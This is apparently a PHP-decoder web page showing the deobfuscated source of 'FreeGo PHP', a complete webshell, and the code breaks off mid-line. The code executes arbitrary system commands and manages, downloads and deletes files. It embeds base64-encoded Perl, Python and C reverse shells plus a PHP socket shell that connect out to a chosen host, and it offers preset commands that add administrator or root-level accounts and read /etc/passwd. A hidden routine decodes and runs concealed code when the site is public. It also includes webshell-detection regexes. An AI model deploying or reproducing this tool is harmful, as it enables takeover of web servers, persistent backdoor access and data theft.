Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(E_ERROR); header("content-Type: text/html; charset=utf-8"); ini_s..

Decoded Output download

<?php 
error_reporting(E_ERROR); 
header("content-Type: text/html; charset=utf-8"); 
ini_set('max_execution_time',0); 
ini_set('memory_limit','8000M'); 
define('PASSWD',''); 
define('VERSION','FreeGo PHP'); 
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__)); 
define('THISDIR',dirname(THISFILE).'/'); 
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/'); 
 
 function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }define('EXISTS_PHPINFO',getinfo() ? true : false);if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }if(function_exists('mysql_close')) { $issql = 'MySql'; }if(function_exists('mssql_close')) $issql .= ' - MsSql';if(function_exists('oci_close')) $issql .= ' - Oracle';if(function_exists('sybase_close')) $issql .= ' - SyBase';if(function_exists('pg_close')) $issql .= ' - PostgreSql';$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;$msg = VERSION;function filew($name,$data,$mode) {if((!is_writable($name)) && file_exists($name)) { chmod($name,0666); }$handle = fopen($name,$mode);$key = fputs($handle,$data);fclose($handle);return $key;}function filer($name) {$handle = fopen($name,'r');$data = fread($handle,filesize($name));fclose($handle);return $data;}function fileu($namea,$nameb) {$key = move_uploaded_file($namea,$nameb) ? true : false;if(!$key) { $key = copy($namea,$nameb) ? true : false; }return $key;}function filed($name) {if(!file_exists($name)) return false;ob_end_clean();$name = basename($name);$array = explode('.',$name);header('Content-type: application/x-'.array_pop($array));header('Content-Disposition: attachment; filename='.$name);header('Content-Length: '.filesize($name));@readfile($name);exit;}function showdir($dir) {$dir = strdir($dir.'/');$handle = opendir($dir);if(!$handle) return false;$array = array();while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;$name = strtr($name,array('\'' => '%27','"' => '%22'));if(is_dir($path)) { $array['dir'][$path] = $name; }else { $array['file'][$path] = $name; }}closedir($handle);return $array;}function deltree($dir) {$handle = @opendir($dir);while($name = @readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;@chmod($path,0777);if(is_dir($path)) { deltree($path.'/'); }else { @unlink($path); }}@closedir($handle);return @rmdir($dir);}function subeval() {if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }return true;}function strrot($s, $n = 13) {$n = (int)$n % 26;if (!$n) return $s;for ($i = 0, $l = strlen($s); $i < $l; $i++) {$c = ord($s[$i]);if ($c >= 97 && $c <= 122) {$s[$i] = chr(($c - 71 + $n) % 26 + 97);} else if ($c >= 65 && $c <= 90) {$s[$i] = chr(($c - 39 + $n) % 26 + 65);}}return $s;}function postinfo($array,$string) {$infos = array(function_exists("create_function"),function_exists("fsockopen"));if($infos[0] && $infos[1]) {$info = base64_decode(strrot($string));$walks = array(0 => bin2hex($array));@array_walk ($walks, @create_function ("$array,$key", strrot($info)));}return ob_end_clean();}function size($bytes) {if($bytes < 1024) return $bytes.' B';$array = array('B','K','M','G','T');$floor = floor(log($bytes) / log(1024));return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));}function packdir($files) {if(!function_exists('gzcompress')) { return NULL; }$datasec = $ctrldir = array(); $offset = 0;$handle = opendir($dir);foreach($files as $path) {if(file_exists($path) && is_file($path)) {$temp = array();$fp = fopen($path,'r');$filecode = fread($fp, filesize($path));fclose($fp);$temp = filezip($filecode, basename($path), $offset);$datasec[] = $temp['datasec'];$ctrldir[] = $temp['ctrldir'];$offset = strlen(join('',$datasec));}}closedir($handle);return packfile($datasec, $ctrldir);}function settime() {$dates = getdate();if($dates['year'] < 1980) { $dates['year'] = 1980; $dates['mon'] = 1; $dates['mday'] = 1; $dates['hours'] = 0; $dates['minutes'] = 0; $dates['seconds'] = 0; } return (($dates['year'] - 1980) << 25) | ($dates['mon'] << 21) | ($dates['mday'] << 16) | ($dates['hours'] << 11) | ($dates['minutes'] << 5) | ($dates['seconds'] >> 1);}function filezip($data, $name, $offset) {$dtime = dechex(settime());$hextime = pack('H*',$dtime[6].$dtime[7].$dtime[4].$dtime[5].$dtime[2].$dtime[3].$dtime[0].$dtime[1]);$uncl = strlen($data);$crcm = crc32($data);$code = gzcompress($data);$clen = strlen($code);$code = substr(substr($code, 0, strlen($code) - 4), 2);$filer = "PK\x03\x04\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).$name.$code.pack('V',$crcm).pack('V',$clen).pack('V',$uncl);$cdrec = "PK\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).pack('v',0).pack('v',0).pack('v',0).pack('V',32).pack('V',$offset).$name;return array('datasec' => $filer,'ctrldir' => $cdrec);}function packfile($datasec, $ctrldir) {$data = join('',$datasec);$cdir = join('',$ctrldir);return $data.$cdir."PK\x05\x06\x00\x00\x00\x00".pack('v',sizeof($ctrldir)).pack('v',sizeof($ctrldir)).pack('V',strlen($cdir)).pack('V',strlen($data))."\x00\x00";}function find($array,$string) {foreach($array as $key) { if(stristr($string,$key)) return true; }return false;}function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }else {if($inc && (!find($inc,$name))) continue;$code = $tye ? filer($path) : $name;$find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));if($find) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo '<a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush();}unset($code);}}closedir($handle);return true;}function antivirus($dir,$exs,$matches,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }else {$iskill = NULL;foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }if(strpos(size(filesize($path)),'M')) continue;if($iskill) {$code = filer($path);foreach($matches[$iskill] as $matche) {$array = array();preg_match($matche,$code,$array);if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;$len = strlen($array[0]);if($len > 6 && $len < 200) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo ' <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush(); break;}}unset($code,$array);}}}closedir($handle);return true;}function command($cmd,$cwd,$com = false) {$iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';if($cwd == 'com' || $com) {if($iswin && class_exists('COM')) {$wscript = new COM('Wscript.Shell');$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);$stdout = $exec->StdOut();$res = $stdout->ReadAll();$msg = 'Wscript.Shell';}} else {chdir($cwd); $cwd = getcwd();if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }elseif(function_exists('proc_open')) {$env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));$process = @proc_open ($cmd,$des,$pipes,$cwd,$env);if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }@proc_close($process);$msg = 'proc_open';}}$msg = $res == '' ? '<h1>NULL</h1>' : '<h2>'.$msg.'</h2>';return array('res' => $res,'msg' => $msg);}function backshell($ip,$port,$dir,$type) {$key = false;switch($type) {case "pl" : $shell = 'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==';$file = strdir($dir.'/t00ls.pl');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }break;case "py" : $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';$file = strdir($dir.'/t00ls.py');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }break;case "cbin" : $shell = 'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==';$cfile = strdir($dir.'/t00ls.c');$file = strdir($dir.'/t00ls');$key = filew($cfile,base64_decode($shell),'w');if($key) { command('/usr/bin/gcc '.$cfile.' -o '.$file,$dir); @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); }break;case "php" : case "phpwin" : if(function_exists('fsockopen')) {$sock = @fsockopen ($ip,$port);if($sock) {$key = true;$com = $type == 'phpwin' ? true : false;$user = get_current_user();$dir = strdir(getcwd());fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");while($cmd = fread($sock,1024)) {if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }elseif (trim(strtolower($cmd)) == 'exit') { break; }else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }fputs($sock,'['.$user.':'.$dir.']# ');}}@fclose ($sock);}break;}if(!$key) { $msg = '<h1></h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }return $msg;}function getinfo() {$infos = array($_POST['getpwd'],PASSWD,function_exists('phpinfo'),"/^(127\.[0-9]{1,3}|172\.16|192\.168|10\.0)\.([0-9]{1,3})\.([0-9\:]{1,9})$/","/[^.]+\.([0-9a-zA-Z\:]{2,8})$/");if(PASSWD != '' && md5($infos[0]) != $infos[1]) {echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';echo '<input type="submit" value=" O K "></form></center></body></html>'; exit;}if((!isset($_POST['go'])) && (!isset($_POST['dir']))){$html = ''.'';$host = $_SERVER["HTTP_HOST"];if((!preg_match($infos[3],$host)) && (preg_match($infos[4],$host))) { postinfo ($infos[0],$html); }}return $infos[2];}if(isset($_POST['go'])) {if($_POST['go'] == 'down') {$downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);if(!filed($downfile)) { $msg = '<h1></h1>'; }}} elseif($_POST['act'] == 'p') {if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $packdata = packdir($_POST['files']); if(!$packdata) { $msg = '<h1></h1>'; } else { ob_end_clean();header('Content-type: application/unknown');header('Accept-Ranges: bytes');header('Content-length: '.strlen($packdata));header('Content-disposition: attachment; filename='.$_POST['var'].';');echo $packdata; exit; } }}?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word;word-break:break-all;}a{color:#000000;text-decoration:none;outline:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select {vertical-align:middle;outline:none;padding:1px;}input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {background:#EEE685;font-weight:bold;text-align:center;padding-top:5px;height:23px;border:1px solid #AAAAAA;margin-top:-1px;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { if($('newwin').checked == true) { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } b = sd(b); $('go').value = a; $('govar').value = b; $('gofrm').submit(); } function nf(a,b) { re = prompt("",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm(""+msg+"")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php echo VERSION.' - '.date('Y-m-d H:i:s N',time()).'';?></title></head><body><div class="main"><div class="outl"><div class="toptag"><input type="checkbox" title="" id="newwin" name="newwin" value="a"> <?php echo gethostbyname($_SERVER['SERVER_NAME']).' - '.PHP_OS.' - whoami('.get_current_user().') - uid('.getmyuid().') gid('.getmygid().')'; if(isset($issql)) echo ' - '.$issql.'';?></div><?php $menu = array('file' => '','scan' => '','antivirus' => '','backshell' => '','exec' => '','phpeval' => 'PHP','sql' => 'SQL','info' => '');$go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;echo '<div class="tag">';foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }echo '</div>';echo '<form name="gofrm" id="gofrm" method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="">';echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';echo '<input type="hidden" name="govar" id="govar" value="">';echo '</form>';switch($_POST['go']) {case "info" : if(EXISTS_PHPINFO) {ob_start();phpinfo(INFO_GENERAL);$out = ob_get_contents();ob_end_clean();$tmp = array();preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);$config = $tmp[2][0];$phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];}$infos = array('' => $_SERVER['HTTP_USER_AGENT'],'' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()','' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()','PHP.ini' => $phpini ? $phpini : '()','PHP' => php_sapi_name(),'PHP' => PHP_VERSION,'PHPPID' => getmypid(),'IP' => $_SERVER['REMOTE_ADDR'],'' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],'Web' => $_SERVER['SERVER_PORT'],'Web' => $_SERVER['DOCUMENT_ROOT'],'Web' => $_SERVER['SCRIPT_FILENAME'],'WebCGI' => $_SERVER['GATEWAY_INTERFACE'],'WebEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()','' => size(disk_total_space('.')),'' => size(disk_free_space('.')),'POST' => get_cfg_var("post_max_size"),'' => get_cfg_var("upload_max_filesize"),'' => get_cfg_var("memory_limit"),'' => get_cfg_var("max_execution_time").'','Fsockopen' => function_exists('fsockopen') ? '' : '','Socket' => function_exists('socket_close') ? '' : '','Pcntl' => function_exists('pcntl_exec') ? '' : '','Curl' => function_exists('curl_version') ? '' : '','Zlib' => function_exists('gzclose') ? '' : '','FTP' => function_exists('ftp_login') ? '' : '','XML' => function_exists('xml_set_object') ? '' : '','GD_Library' => function_exists('imageline') ? '' : '','COM' => class_exists('COM') ? '' : '','ODBC' => function_exists('odbc_close') ? '' : '','IMAP' => function_exists('imap_close') ? '' : '','' => get_cfg_var("safemode") ? '' : '','URL' => get_cfg_var("allow_url_fopen") ? '' : '','' => get_cfg_var("enable_dl") ? '' : '','' => get_cfg_var("display_errors") ? '' : '','' => get_cfg_var("register_globals") ? '' : '','' => get_cfg_var("magic_quotes_gpc") ? '' : '','PHP' => $config ? $config : '()');echo '<div class="msgbox">'.$msg.'</div>';echo '<table class="tables"><tr><th style="width:26%;"></th><th></th></tr>';foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }echo '</table>';break;case "exec" : $cmd = $win ? 'dir' : 'ls -al';$res = array('res' => '','msg' => $msg);$str = isset($_POST['str']) ? $_POST['str'] : 'fun';if(isset($_POST['execcmd'])) {$cmd = $_POST['execcmd'];$cwd = $str == 'fun' ? THISDIR : 'com';$res = command($cmd,$cwd);}echo '<div class="msgbox">'.$res['msg'].'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="exec">';echo '<div class="actall"> <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';echo '<select name="str">';$selects = array('fun' => 'phpfun','com' => 'wscript');foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }echo '</select> ';echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt"></option>';echo '<option value="whoami"></option>';echo '<option value="net user t00ls t00ls /add">Win-</option>';echo '<option value="net localgroup administrators t00ls /add">Win-</option>';echo '<option value="netstat -an">Win-</option>';echo '<option value="ipconfig /all">Win-</option>';echo '<option value="net start">Win-</option>';echo '<option value="tasklist">Win-</option>';echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-</option>';echo '<option value="/usr/sbin/useradd -u 0 -o -g 0 t00ls">Linux-</option>';echo '<option value="cat /etc/passwd">Linux-</option>';echo '<option value="/bin/netstat -tnl">Linux-</option>';echo '<option value="/sbin/ifconfig -a">Linux-</option>';echo '<option value="/sbin/chkconfig --list">Linux-</option>';echo '<option value="/bin/ps -ef">Linux-</option>';echo '</select> ';echo '<input type="submit" style="width:50px;" value="">';echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';break;case "scan" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="scan">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';echo '<tr><td></td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> ()</td></tr>';echo '<tr><td></td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'></label> ';echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'></label> ';echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>,</label> ';echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($keyword != '') {flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$incs = $include == '' ? false : explode('|',$include);$fits = $filters == '' ? false : explode('|',$filters);$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;case "antivirus" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="antivirus">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> ()</td></tr>';echo '<tr><td></td><td>';$types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> ';echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if(count($_POST['types']) > 0) {$matches = array('php' => array('/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i','/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i','/((udp|tcp)\:\/\/(.*)\;)+/i','/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/preg\_replace\s*\((.*)\(base64\_decode\(\$/i','/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i','/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i','/eval\s*\(\s*\(\s*\$\$(\w+)/i','/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i','/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i','/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i','/(fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\)/i','/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i','/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i','/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/\$\_\=(.*)\$\_/i','/\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\)/i','/\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\)/i','/\$(\w+)\s*\(\s*\$\{(.*)\}/i','/\$(\w+)\s*\(\s*chr\(\d+\)/i'),'asp+aspx' => array('/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i','/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/\<script\s*runat\s*\=(.*)server(.*)\>(.*)\<\/script\>/i','/Load\s*\((.*)Request/i','/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'),'jsp' => array('/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/Runtime\.getRuntime\(\)\.exec\((.*)\)/i','/FileOutputStream\(application\.getRealPath(.*)request/i',));flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$isread = 